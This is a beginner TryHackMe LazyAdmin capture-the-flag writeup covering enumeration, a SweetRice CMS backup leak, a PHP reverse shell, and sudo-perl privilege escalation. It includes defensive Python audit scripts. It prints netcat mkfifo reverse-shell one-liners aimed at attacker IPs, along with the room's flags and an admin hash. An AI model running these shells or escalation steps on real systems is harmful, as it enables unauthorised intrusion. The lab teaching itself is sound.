ImperialX1104/LazyAdmin-Writeup
# LazyAdmin-Writeup
Beginner-friendly TryHackMe LazyAdmin writeup covering enumeration, web exploitation, credential discovery, and privilege escalation.
# TryHackMe - LazyAdmin Writeup
## Room Information
| Category | Details |
| -------------- | ----------------------------------------------------------------------------------------- |
| Platform | TryHackMe |
| Room Name | LazyAdmin |
| Difficulty | Easy |
| Skills Learned | Enumeration, Web Exploitation, Credential Discovery, Reverse Shells, Privilege Escalation |
# Introduction
In this writeup, I solved the **LazyAdmin** room on TryHackMe.
The objective of this room was to:
* Perform reconnaissance
* Enumerate services
* Discover vulnerabilities
* Gain initial access
* Escalate privileges to root
This room demonstrates how exposed backups, insecure CMS configurations, and weak privilege separation can lead to full system compromise.
# Reconnaissance
## Verifying Connectivity
Before starting enumeration, I verified that the target machine was reachable.
```bash
ping 10.48.149.136
```
The target responded successfully.
### Screenshot

# Nmap Enumeration
## Aggressive Scan
I performed an aggressive Nmap scan to identify open ports, running services, versions, and operating system details.
```bash
nmap -A -v -T4 10.48.149.136
```
## Scan Explanation
| Flag | Purpose |
| ----- | -------------------------------------------------------------------- |
| `-A` | Enables OS detection, service detection, NSE scripts, and traceroute |
| `-v` | Verbose output |
| `-T4` | Faster scan timing |
## Scan Results
| Port | Service | Version |
| ---- | ------- | -------------------- |
| 22 | SSH | OpenSSH 7.2p2 Ubuntu |
| 80 | HTTP | Apache 2.4.18 Ubuntu |
### Key Findings
* Ubuntu Linux target
* Apache web server
* SSH service enabled
* Potential hidden web application
### Screenshot

# Web Enumeration
## Accessing the Website
Navigating to the target IP displayed the default Apache page.
### Observation
The default page indicated:
* Apache was correctly configured
* No direct application was visible
* Hidden directories likely existed
### Screenshot

# Directory Enumeration
## Initial FFUF Scan
I used FFUF to brute-force hidden directories.
```bash
ffuf -u http://10.48.149.136/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```
## Results
A hidden directory named `content` was discovered.
### Screenshot

# Discovering SweetRice CMS
Navigating to `http://10.48.149.136/content/` revealed that the target was running **SweetRice CMS**.
### Key Findings
* SweetRice CMS identified
* Site under construction
* Administrative references visible
* Potentially vulnerable CMS version
### Screenshot

# Vulnerability Research
## Searching for Public Exploits
I searched for publicly available exploits related to SweetRice CMS.
```bash
searchsploit SweetRice
```
### Interesting Result
```
SweetRice 1.5.1 - Backup Disclosure
```
This vulnerability suggested that backup files could be publicly accessible.
### Screenshot

# Additional Enumeration
## Enumerating `/content`
I performed another FFUF scan against the `/content` directory.
```bash
ffuf -u http://10.48.149.136/content/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
```
## Interesting Directories
| Directory | Description |
| ------------ | -------------------------- |
| `inc` | Included application files |
| `as` | Admin panel |
| `attachment` | Uploaded files |
| `_themes` | Themes |
| `js` | JavaScript resources |
| `images` | Image assets |
### Screenshot

# Exploit Analysis
## Reviewing Exploit-DB
The Exploit-DB advisory explained that SweetRice 1.5.1 exposed backup files publicly.
### Vulnerable Path
```
/content/inc/mysql_backup/
```
### Screenshot

# Exploiting Backup Disclosure
## Accessing the Backup Directory
Navigating to the vulnerable directory revealed a downloadable SQL backup file.
```
/content/inc/mysql_backup/
```
### Exposed Backup File
```
mysql_bakup_20191129023059-1.5.1.sql
```
### Screenshot

# Inspecting the SQL Backup
## Reviewing Database Contents
The SQL dump was inspected locally.
```bash
cat mysql_bakup_20191129023059-1.5.1.sql
```
## Extracting Credentials
While reviewing the SQL dump, administrator credentials were discovered.
### Credentials
```
Username: manager
Hash: 42f749ade7f9e195bf475f37a44cafcb
```
The administrator username and MD5 password hash were successfully identified.
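The two findings above (a dump reachable under the web root, and an unsalted MD5 digest inside it) are exactly what a pre-deployment check should catch. The following is an added example of my own, not code from the room or from SweetRice: it walks a document root, reports every backup-looking file by the URL a client would request, and for `.sql` files summarises what a downloader would learn. The sample dump and directory layout are constructed to mirror the room (the digest used is the MD5 of the empty string, not the room's hash), and the name patterns are heuristics.

```python
import os
import re
import tempfile
from typing import List, Tuple

# Names that usually mean "database dump" or "site backup" (heuristic list).
BACKUP_NAME_RE = re.compile(r"backup|bakup|dump|\.sql$|\.bak$|\.tar(\.gz)?$|\.zip$", re.I)
# INSERT statements into tables that usually hold logins.
CRED_TABLE_RE = re.compile(r"INSERT\s+INTO\s+`?(\w*(?:user|admin|account|login)\w*)`?", re.I)
# 32 hex characters: the size of an unsalted MD5 digest (heuristic).
MD5_LIKE_RE = re.compile(r"\b[0-9a-f]{32}\b", re.I)


def classify_dump(sql_text: str) -> List[str]:
    """Describe what someone who downloads this dump would learn from it."""
    issues = [f"credential-bearing table: {m.group(1)}" for m in CRED_TABLE_RE.finditer(sql_text)]
    digests = MD5_LIKE_RE.findall(sql_text)
    if digests:
        issues.append(f"{len(digests)} unsalted MD5-sized digest(s), cheap to brute-force offline")
    return issues


def audit_webroot(docroot: str) -> List[Tuple[str, str]]:
    """Walk a served directory tree and report every backup-looking file by the
    URL path a client would request, plus what a .sql file would reveal."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            full = os.path.join(dirpath, name)
            in_backup_dir = BACKUP_NAME_RE.search(os.path.basename(dirpath)) is not None
            if not (BACKUP_NAME_RE.search(name) or in_backup_dir):
                continue
            url = "/" + os.path.relpath(full, docroot).replace(os.sep, "/")
            detail = "backup artifact reachable over HTTP"
            if name.lower().endswith(".sql"):
                with open(full, encoding="utf-8", errors="replace") as fh:
                    detail += "".join("; " + issue for issue in classify_dump(fh.read()))
            findings.append((url, detail))
    return sorted(findings)


# Constructed sample dump (not the room's real file): one admin row with the
# MD5 of the empty string standing in for the password digest.
SAMPLE_DUMP = """\
CREATE TABLE `users` (`id` int, `name` varchar(64), `passwd` varchar(32));
INSERT INTO `users` VALUES (1, 'manager', 'd41d8cd98f00b204e9800998ecf8427e');
"""


def demo() -> List[Tuple[str, str]]:
    """Build a throwaway docroot shaped like the room's layout and audit it."""
    with tempfile.TemporaryDirectory() as docroot:
        backup_dir = os.path.join(docroot, "content", "inc", "mysql_backup")
        os.makedirs(backup_dir)
        with open(os.path.join(backup_dir, "mysql_bakup_20191129023059-1.5.1.sql"), "w") as fh:
            fh.write(SAMPLE_DUMP)
        with open(os.path.join(docroot, "content", "index.php"), "w") as fh:
            fh.write("<?php echo 'under construction'; ?>\n")
        return audit_webroot(docroot)


if __name__ == "__main__":
    for url, detail in demo():
        print(f"{url}: {detail}")
```

Run it against a real document root with `audit_webroot("/var/www/html")`; any hit is a file that belongs outside the served tree (or behind an explicit deny rule), and a dump that stores 32-hex digests should be treated as already cracked.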
### Screenshot

# Administrative Access
## Accessing the Admin Panel
Using the recovered credentials, I authenticated to the SweetRice administrative dashboard.
### Admin URL
```
http://10.48.149.136/content/as/
```
Administrative access was successfully achieved.
### Screenshot

# Remote Code Execution
## Preparing the Netcat Listener
Before triggering the reverse shell payload, I started a Netcat listener.
```bash
nc -lvnp 5555
```
## Reverse Shell Connection
After uploading and executing the PHP reverse shell payload through the SweetRice CMS, the target connected back successfully.
### Reverse Shell Information
```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
The shell was obtained as the `www-data` user.
### Screenshot

# User Enumeration
## Exploring the Filesystem
After gaining shell access, I enumerated the filesystem.
```bash
cd /home
ls
```
The user `itguy` was discovered.
### Listing User Files
```bash
cd itguy
ls
```
Interesting files:
* `backup.pl`
* `mysql_login.txt`
* `user.txt`
# Capturing the User Flag
## Reading the User Flag
```bash
cat user.txt
```
### User Flag
```
THM{63e5bce9271952aad1113b6f1ac28a07}
```
### Screenshot

# Privilege Escalation
## Checking Sudo Permissions
I checked the sudo permissions available to the `www-data` user.
```bash
sudo -l
```
### Sudo Output
```
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
```
This indicated that the Perl script could be executed as root without a password.
### Screenshot

# Inspecting the Vulnerable Perl Script
## Reviewing `backup.pl`
```bash
cat /home/itguy/backup.pl
```
### Script Contents
```perl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
```
Because sudo runs the script as root, everything in `/etc/copy.sh` also runs as root; a helper script that `www-data` can rewrite is therefore the real privilege-escalation point, not the Perl file itself.
# Inspecting `copy.sh`
## Reviewing the Payload
```bash
cd /etc
cat copy.sh
```
### Existing Payload
```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
```
The existing payload pointed at a different address, so it had to be modified to connect back to my attacking machine.
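The `sudo -l` rule, `backup.pl` and `copy.sh` above form one chain: root executes `backup.pl`, which executes `copy.sh`, and whichever link a low-privileged user can edit decides who controls root. As an added example (my own check, not tooling from the room or from TryHackMe), the Python below parses a `sudo -l` line, follows every absolute path the named files mention, and reports each file the invoking user could rewrite; it then re-runs the audit after the one fix that matters, a root-owned `copy.sh` with mode 0755. The file snapshot is constructed: the room does not list ownership or modes, so those are assumptions, while uid/gid 33 comes from the `id` output earlier in this writeup.

```python
import re
import stat
from typing import Dict, List, NamedTuple, Tuple


class FileInfo(NamedTuple):
    uid: int       # owner
    gid: int       # group
    mode: int      # permission bits, e.g. 0o644
    content: str   # file text, scanned for further absolute paths


# Absolute paths mentioned inside a file, e.g. system("sh", "/etc/copy.sh").
PATH_RE = re.compile(r'(?<![\w.])(/[\w./-]+)')


def sudo_rule_paths(rule: str) -> List[str]:
    """Return the absolute paths named in one `sudo -l` line, e.g.
    '(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl'."""
    command = rule.rsplit(":", 1)[1] if ":" in rule else rule
    return [tok for tok in command.split() if tok.startswith("/")]


def writable_by(info: FileInfo, uid: int, gids: Tuple[int, ...]) -> bool:
    """Could a user with this uid/gids rewrite the file? Judged from ownership
    and permission bits (the owner can always chmod, so ownership counts)."""
    if info.uid == uid:
        return True
    if info.gid in gids and info.mode & stat.S_IWGRP:
        return True
    return bool(info.mode & stat.S_IWOTH)


def audit_sudo_target(start: str, fs: Dict[str, FileInfo], uid: int, gids: Tuple[int, ...]) -> List[str]:
    """Follow `start` and every absolute path its contents mention; report each
    file the invoking user could rewrite. Any editable link in that chain
    becomes root-controlled code once the sudo rule fires."""
    findings: List[str] = []
    seen = set()
    queue = [start]
    while queue:
        path = queue.pop(0)
        if path in seen or path not in fs:   # unknown paths are outside the snapshot
            continue
        seen.add(path)
        info = fs[path]
        if writable_by(info, uid, gids):
            findings.append(f"{path}: writable by uid {uid} (owner {info.uid}, mode {info.mode:04o})")
        queue.extend(PATH_RE.findall(info.content))
    return findings


# Constructed snapshot (ownership and modes are assumed; the room does not
# list them). www-data is uid/gid 33 as in the `id` output.
INSECURE_FS: Dict[str, FileInfo] = {
    "/usr/bin/perl": FileInfo(0, 0, 0o755, ""),
    "/bin/sh": FileInfo(0, 0, 0o755, ""),
    "/home/itguy/backup.pl": FileInfo(0, 0, 0o644, '#!/usr/bin/perl\nsystem("sh", "/etc/copy.sh");\n'),
    "/etc/copy.sh": FileInfo(0, 0, 0o777, "tar czf /var/backups/site.tgz /var/www/html\n"),
}
RULE = "(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl"
WWW_DATA = (33, (33,))


def audit_rule(rule: str, fs: Dict[str, FileInfo]) -> List[str]:
    """Audit every path a sudo rule names (interpreter and script alike)."""
    findings: List[str] = []
    for path in sudo_rule_paths(rule):
        findings.extend(audit_sudo_target(path, fs, *WWW_DATA))
    return findings


def demo() -> Tuple[List[str], List[str]]:
    """Audit the chain as found, then again with /etc/copy.sh root-owned
    and not writable by anyone else."""
    fixed_fs = dict(INSECURE_FS)
    fixed_fs["/etc/copy.sh"] = INSECURE_FS["/etc/copy.sh"]._replace(mode=0o755)
    return audit_rule(RULE, INSECURE_FS), audit_rule(RULE, fixed_fs)


if __name__ == "__main__":
    before, after = demo()
    print("before:", before or "no findings")
    print("after: ", after or "no findings")
```

On a live host the snapshot would be built from `os.stat()` and the file contents; the path regex is deliberately simple and will miss paths built at runtime, so treat a clean result as necessary rather than sufficient.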
# Modifying the Reverse Shell Payload
Because the reverse shell lacked a proper TTY, editors such as `nano` failed.
Instead, I overwrote the file using `echo`.
```bash
echo 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.204.24 6666 > /tmp/f' > /etc/copy.sh
```
# Starting the Root Listener
On my Kali machine, I started another Netcat listener.
```bash
nc -lvnp 6666
```
# Executing the Perl Script
I executed the vulnerable Perl script using sudo.
```bash
sudo /usr/bin/perl /home/itguy/backup.pl
```
This triggered the reverse shell payload as root.
# Root Shell Obtained
The target connected back successfully.
### Verifying Root Access
```bash
whoami
```
### Output
```
root
```
# Capturing the Root Flag
## Navigating to Root Directory
```bash
cd /root
ls
```
The `root.txt` file was discovered.
## Reading the Root Flag
```bash
cat root.txt
```
### Root Flag
```
THM{6637f41d0177b6f37cb20d775124699f}
```
### Screenshot

# Flags Captured
| Flag | Value |
| --------- | --------------------------------------- |
| User Flag | `THM{63e5bce9271952aad1113b6f1ac28a07}` |
| Root Flag | `THM{6637f41d0177b6f37cb20d775124699f}` |
# Conclusion
The LazyAdmin room demonstrated several critical real-world security issues:
* Publicly exposed backup files
* Weak password storage mechanisms
* Vulnerable CMS deployment
* Unsafe sudo configurations
* Insecure script execution
By chaining these vulnerabilities together, full system compromise was achieved from initial web enumeration to root access.
# Tools Used
* Nmap
* FFUF
* Searchsploit
* Netcat
* Kali Linux
* Exploit-DB
* Perl
# Disclaimer
This writeup was created strictly for educational purposes on the TryHackMe platform.
Do not attempt these techniques on systems without explicit authorization.